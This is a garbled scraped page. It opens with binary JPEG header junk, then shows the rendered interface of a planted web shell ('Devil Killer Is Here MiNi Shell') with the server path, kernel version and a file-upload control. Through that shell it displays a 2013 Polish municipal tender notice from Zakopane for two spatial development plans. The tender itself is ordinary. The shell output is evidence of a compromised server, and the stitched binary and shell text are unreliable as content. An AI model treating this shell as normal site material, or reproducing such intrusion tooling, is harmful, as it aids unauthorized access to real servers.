JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131016/215245-N-2013.html

<p class="kh_header"><b>Zakopane: BZP.271.72.2013  wykonanie projektu miejscowego planu zagospodarowania przestrzennego Zakopianka i  wykonanie projektu  zmiany miejscowego planu zagospodarowania przestrzennego Gubałówka I</b><br>
<b>Numer ogłoszenia: 215245 - 2013; data zamieszczenia: 16.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.72.2013  wykonanie projektu miejscowego planu zagospodarowania przestrzennego Zakopianka i  wykonanie projektu  zmiany miejscowego planu zagospodarowania przestrzennego Gubałówka I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr I:

1.Przedmiotem zamówienia Zadania I  jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego zwanego w treści umowy projektem planu oraz wykonania czynności związanych ze sporządzeniem tego planu według procedur i problematyki określonej w ustawie z dnia 27 marca 2003r.o  planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012r. poz. 647 t. j. ze zm.),a także innymi przepisami odrębnymi dla obszaru określonego w załączniku graficznym nr 1 do Uchwały Rady Miasta Zakopane Nr XXXII 401 2012 z dnia 27 września 2012 r. w sprawie przystąpienia do sporządzenia Miejscowego planu zagospodarowania przestrzennego Zakopianka w Zakopanem, o powierzchni opracowania ok. 34 ha. Projekt planu składać się będzie z części tekstowej i graficznej, prognozy oddziaływania na środowisko oraz opracowania ekofizjograficznego, prognozy skutków finansowych uchwalenia planu.

2.Zakres projektu planu według Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164 poz. 1587).

3.W zakres umowy wchodzi wykonanie przez Wykonawcę wszystkich wskazanych w ust. 1 opracowań, uczestniczenie w czynnościach oraz przygotowanie pism szczegółowo określonych w harmonogramie prac i płatności stanowiącym załącznik nr 2 do umowy oraz wszelkie prace projektowe lub czynności nie opisane w umowie i specyfikacji, a wynikające z procedur określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz innych przepisach prawa, w tym uchwalonych po dniu podpisania umowy, niezbędne do właściwego i kompletnego opracowania zamówienia.

4.Wykonawca wykona projekty planów i opracowań w tradycyjnej formie maszynopisu i planszowych rysunków oraz cyfrowej. Część cyfrowa, graficzna ma być sporządzona, jako zapis w formie umożliwiającej odczytanie i wydrukowanie każdego ze zbioru elementów określonej grupy tematycznej (niezależne pliki) oddzielnie lub kilku plików razem z zachowaniem założonej kolejności ich wyświetlania. Opracowanie cyfrowe, graficzne winno być dostarczone w programie, który umożliwia wymianę danych w standardach GIS. Projekt planu zgodnie  z  § 3. ust.1. Rozporządzenia z dnia 27 grudnia 2011 r. w sprawie wymagań technicznych dla dokumentów elektronicznych zawierających akty normatywne i inne akty prawne, dzienników urzędowych wydawanych w postaci elektronicznej oraz środków komunikacji elektronicznej i informatycznych nośników danych (Dz. U. z 2011 r. Nr 289, poz 1699) winien być sporządzony w formacie XML z uwzględnieniem specyfiki programu. W przypadku zmiany zapisów powyższego rozporządzenia w trakcie sporządzania projektu planu, Wykonawca uwzględni te zmiany w sporządzanym projekcie planu.

5.Potwierdzeniem wykonania zamówienia jest przekazanie planu końcowym protokołem zdawczo - odbiorczym, w następującej formie:
1)analogowej (papierowej) planu , w tym:
a.1 egz. rysunku planu w kolorze stanowiący  załącznik do uchwały w sprawie uchwalenia planu jako odpowiednio oprawionej mapy ściennej na twardym podkładzie sporządzony w skali 1 : 2000,
b.6 egz. rysunku planu w kolorze stanowiący  załącznik do uchwały w sprawie uchwalenia planu, w formie luźnej sporządzonych w skali 1 : 2000,
c.2 oprawione egz. wydruku uchwały w formacie XML w sprawie uchwalenia planu,
d.2 oprawione egz. prognozy oddziaływania na środowisko, z rysunkiem,
e.2 oprawione egz. opracowania ekofizjograficznego, z rysunkiem.
2)Cyfrowej, w tym:
a.1 egz. płyt CD zawierające materiały wymienione w ust 1,
1 Teczki w twardej okładce  zawierającej oprawione opracowania:
a. w formie analogowej 1 egz. tekstu w formacie XML i rysunku planu stanowiącego załącznik do uchwały w sprawie uchwalenia planu w kolorze, w formie luźnej  sporządzony w skali 1 : 2000,
b.w formie analogowej 1 oprawiony egz. prognozy oddziaływania na środowisko, z rysunkiem,
c.w formie analogowej 1 egz. opracowania ekofizjograficznego,z rysunkiem.
d.1 egz. płyt CD zawierającej w formie cyfrowej wymienione w niniejszym punkcie materiały.
4)1 egzemplarz dokumentacji formalno prawnej (oryginał ).
Zadanie nr II

1.Przedmiotem zamówienia zadania II  jest wykonanie projektu zmiany Miejscowego planu zagospodarowania przestrzennego Gubałówka I  przyjętego Uchwałą Rady Miasta Zakopane Nr XXVII/345/2008 z dnia 31 lipca 2008r. (Dziennik Urzędowy Województwa Małopolskiego Nr 589, poz. 3873 z dnia 12 września 2008r.), zwanego w treści umowy projektem planu oraz wykonania czynności związanych ze sporządzeniem tego planu według procedur i problematyki określonej w ustawie z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012r. poz. 647 t. j. ze zm.), a także innymi przepisami odrębnymi dla obszaru określonego w załączniku graficznym nr 1 do Uchwały Rady Miasta Zakopane Nr XXXVII 481 2013 z dnia 28 lutego 2013 r. w sprawie przystąpienia do sporządzenia zmiany Miejscowego planu zagospodarowania przestrzennego Gubałówka I , o powierzchni opracowania ok. 0,77 ha. Projekt planu składać się będzie z części tekstowej i graficznej, prognozy oddziaływania na środowisko oraz prognozy skutków finansowych uchwalenia planu.

2.Zakres projektu planu według Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164 poz. 1587).

3.W zakres umowy wchodzi wykonanie przez Wykonawcę wszystkich wskazanych w ust. 1 opracowań, uczestniczenie w czynnościach oraz przygotowanie pism szczegółowo określonych w harmonogramie prac i płatności stanowiącym załącznik nr 2 do umowy oraz wszelkie prace projektowe lub czynności nie opisane w umowie i specyfikacji, a wynikające z procedur określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz innych przepisach prawa, w tym uchwalonych po dniu podpisania umowy, niezbędne do właściwego i kompletnego opracowania zamówienia.

4.Wykonawca wykona projekty planów i opracowań w tradycyjnej formie maszynopisu  i planszowych rysunków oraz cyfrowej. Część cyfrowa, graficzna ma być sporządzona, jako zapis w formie umożliwiającej odczytanie i wydrukowanie każdego ze zbioru elementów określonej grupy tematycznej (niezależne pliki) oddzielnie lub kilku plików razem z zachowaniem założonej kolejności ich wyświetlania. Opracowanie cyfrowe, graficzne winno być dostarczone w programie, który umożliwia wymianę danych w standardach GIS. Projekt planu zgodnie   z  § 3.ust.1.Rozporządzenia z dnia 27 grudnia 2011 r. w sprawie wymagań technicznych dla dokumentów elektronicznych zawierających akty normatywne i inne akty prawne, dzienników urzędowych wydawanych w postaci elektronicznej oraz środków komunikacji elektronicznej i informatycznych nośników danych (Dz. U. z 2011 r. Nr 289, poz 1699) winien być sporządzony w formacie XML z uwzględnieniem specyfiki programu. W przypadku zmiany zapisów powyższego rozporządzenia w trakcie sporządzania projektu planu, Wykonawca uwzględni te zmiany w sporządzanym projekcie planu.

5.Potwierdzeniem wykonania zamówienia jest przekazanie planu końcowym protokołem zdawczo - odbiorczym, w następującej formie:
1)analogowej (papierowej) planu , w tym:
a.1 egz. rysunku planu w kolorze stanowiący  załącznik do uchwały w sprawie uchwalenia planu jako odpowiednio oprawionej mapy ściennej na twardym podkładzie, sporządzony w skali 1 : 2000,
b.6 egz.  rysunku planu w kolorze stanowiący  załącznik do uchwały w sprawie uchwalenia planu, w formie  luźnej  sporządzonych w skali 1 : 2000,
c.2 oprawione egz. wydruku uchwały w formacie XML w sprawie uchwalenia planu,
d.2 oprawione egz. prognozy oddziaływania na środowisko, z rysunkiem,
2)Cyfrowej, w tym:
a.1 egz. płyt CD zawierające materiały wymienione w ust 1,
 1 Teczki w twardej okładce  zawierającej oprawione opracowania:
a. w formie analogowej 1 egz. tekstu w formacie XML i rysunku planu stanowiącego załącznik do uchwały w sprawie uchwalenia planu w kolorze, w formie luźnej sporządzony w skali 1 : 2000,
b.w formie analogowej 1 oprawiony egz. prognozy oddziaływania na środowisko, z rysunkiem,
c.1 egz. płyt CD zawierającej w formie cyfrowej wymienione w niniejszym punkcie materiały.
4)1 egzemplarz dokumentacji formalno prawnej (oryginał )..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca jest zobowiązany wnieść wadium przetargowe    
    w wysokości : 
1)dla Zadania  I   -700,00     zł  ( słownie:   siedemset   złotych)
2)dla Zadania  II  -700,00     zł  ( słownie:   siedemset   złotych)

 Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
 - pieniądzu;
 - poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
 oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze 
poręczeniem pieniężnym;
 -  gwarancjach bankowych;
-  gwarancjach ubezpieczeniowych;
 -  poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 
  5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji   
 Rozwoju Przedsiębiorczości (Dz.U z 2007r. Nr 42 poz.275 z późn. zm.) 

 Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu   
 Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85 1240 4748 1111 0000   4871 8666   
Wadium powinno znajdować się na koncie zamawiającego najpóźniej   
w terminie składania ofert tj. 06  listopada 2013 r. do godz.  12:00

 Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału,   
 najpóźniej w terminie składania ofert tj. 06 listopada 2013 r. do godz. 12:00 w   
 Biurze   ds. zamówień publicznych pok. nr 8 (parter).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony jeżeli wykonawca  składając ofertę złoży   stosowne oświadczenie o    spełnianiu warunków udziału w    postępowaniu

Ocena spełnienia powyższego  warunku  będzie dokonana   w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy  Zadania  I  :

 Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w    ciągu ostatnich 3 lat przed upływem terminu składania ofert  a jeżeli okres   prowadzenia działalności jest krótszy w tym okresie wykonał miejscowe plany zagospodarowania, które zostały zatwierdzone i opublikowane na podstawie ustawy o planowaniu i zagospodarowaniu przestrzennym z 2003 r. (Dz. U. z 2012r. poz. 647 t. j. ze zm.), w ilości co najmniej:

-2 plany w granicach administracyjnych miasta w skali 1:2000 lub 1 : 1000 o min. powierzchni 30 ha każdy plan, o wartości zamówienia minimum 40.000 zł brutto każdy plan

przy czym z powyższych dwóch  planów co najmniej 1 obejmował drogę krajową lub         wojewódzką.

Ocena spełnienia powyższego  warunku  będzie dokonana   w oparciu o   
wymagane dokumenty i oświadczenia dołączone  do  oferty .

Dotyczy  Zadania  II  :
Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w    ciągu ostatnich 3 lat przed upływem terminu składania ofert  a jeżeli okres   prowadzenia działalności jest krótszy w tym okresie wykonał miejscowe plany zagospodarowania, które zostały zatwierdzone i opublikowane na podstawie ustawy o planowaniu i zagospodarowaniu przestrzennym z 2003 r. (Dz. U. z 2012r. poz. 647 t. j. ze zm.), w ilości co najmniej:

- 2 plany w granicach administracyjnych miasta w skali 1:2000 lub 1 : 1000 o min. powierzchni 0,7 ha każdy plan, wartość zamówienia minimum 20.000 zł brutto każdy plan.

Ocena spełnienia powyższego  warunku  będzie dokonana   w oparciu o   
wymagane dokumenty i oświadczenia dołączone  do  oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
 oświadczenie o spełnianiu warunków udziału w postępowaniu.

Ocena spełnienia powyższego warunku będzie dokonana   w oparciu o wymagane dokumenty i oświadczenia dołączone  do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że  
dysponuje do   wykonania zamówienia  Głównym Projektantem  wykazującym się aktualna  przynależnością do Okręgowej Izby Urbanistów i Izby Architektów lub dysponuje  Głównym Projektantem  wykazującym się aktualna przynależnością   do Okręgowej Izby Urbanistów  i  ponadto  wykaże ,że dysponuje  zespołem projektowym w którym  jeden z członków wykazuje się   aktualną przynależnością   do Izby Architektów.

Ocena spełnienia powyższego warunku będzie dokonana   w oparciu o wymagane dokumenty i oświadczenia dołączone  do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca  składając ofertę na oba Zadania  wykaże się posiadaniem opłaconej polisy, a w przypadku jej braku, innym dokumentem potwierdzającym, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie niższej niż  60  000,00 zł ( słownie:  sześćdziesiąt tysięcy złotych)  . 
W przypadku składania oferty  tylko na  jedno Zadanie warunek zostanie uznany za spełniony jeżeli wykonawca   wykaże się posiadaniem opłaconej polisy, a w przypadku jej braku, innym dokumentem potwierdzającym, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie niższej niż 
1)dla Zadania 1 -  40  000,00 zł ( słownie:  czterdzieści  tysięcy złotych)  
2)dla Zadania II - 20 000,00 zł  ( słownie: dwadzieścia tysięcy złotych) . 

  Ocena spełnienia powyższego warunku będzie dokonana   w oparciu o wymagane   dokumenty i oświadczenia dołączone  do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 Ustawy Zamawiający informuje, że przewiduje możliwość zmiany umowy oraz harmonogramu prac i płatności stanowiącego załącznik nr 2 do niniejszej umowy, na pisemny umotywowany wniosek Wykonawcy, w następujących przypadkach: 
1.Terminu wykonania zamówienia w przypadku:
a)konieczności powtórzenia prac lub czynności z przyczyn proceduralnych niezależnych od Wykonawcy,
b)działania siły wyższej, za które uważa się zdarzenia o charakterze nadzwyczajnym, które wystąpią po zawarciu umowy, a których strony nie były w stanie przewidzieć w momencie jej zawarcia i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu umowy w sposób należyty,
c)konieczności wykonania zamówienia dodatkowego, które jest niezbędne dla prawidłowej realizacji przedmiotu zamówienia, a którego nie można było przewidzieć na etapie składania oferty,
d)rezygnacji z realizacji części zamówienia,
e)czasowego wstrzymania prac przez zamawiającego,
f)wystąpienia, w trakcie wykonywania umowy, zmian dotyczących warunków projektowania z powodu zmiany przepisów, norm lub normatywów mających zastosowanie do przedmiotu umowy, których strony umowy nie mogły przewidzieć w chwili jej zawierania,
g)wystąpienia okoliczności zewnętrznych, niezależnych od Wykonawcy, które uniemożliwiają dotrzymanie terminu,
2.Wysokości wynagrodzenia wykonawcy w przypadku gdy nastąpi ustawowa  zmiana wysokości stawki podatku VAT przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział  Gospodarki Gruntami i Planowania Przestrzennego pok.203
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2013 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8 
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
